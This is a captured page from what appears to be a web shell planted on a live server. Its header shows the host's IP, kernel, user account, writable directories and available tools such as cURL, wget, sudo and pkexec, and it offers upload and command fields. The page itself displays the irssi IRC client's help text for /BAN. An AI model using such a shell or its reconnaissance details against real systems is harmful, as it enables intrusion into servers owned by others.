403Webshell
Server IP : 45.40.142.9  /  Your IP : 216.73.216.250
Web Server : Apache
System : Linux s45-40-142-9.secureserver.net 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : bayspec ( 506)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/irssi/help/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/irssi/help/ban
BAN %|[<channel>] [<nicks>]
BAN %|[-normal | -user | -host | -domain | -custom <type>] <nicks/masks>

Bans the specified nick or userhost mask.

If nick is given as parameter, the ban type is used to generate the ban mask. /SET ban_type specified the default ban type. Ban type is one of the following:

    Normal - *!*user@*.domain.net
    User   - *!*user@*
    Host   - *!*@host.domain.net
    Domain - *!*@*.domain.net
    Custom [nick] [user] [host] [domain]

If no arguments are given the current bans in this channel are displayed.

Examples:
    /BAN loser        - Bans the nick 'loser'
    /BAN -host loser  - Bans the host of nick 'loser'
    /BAN *!*@*.org    - Bans all the users coming from any .org domain.

    /SET ban_type custom nick domain - nick!*@*.domain.net
    /SET ban_type custom user host   - *!user@host.domain.net

See also: KNOCKOUT, KICKBAN


Youez - 2016 - github.com/yon3zu
LinuXploit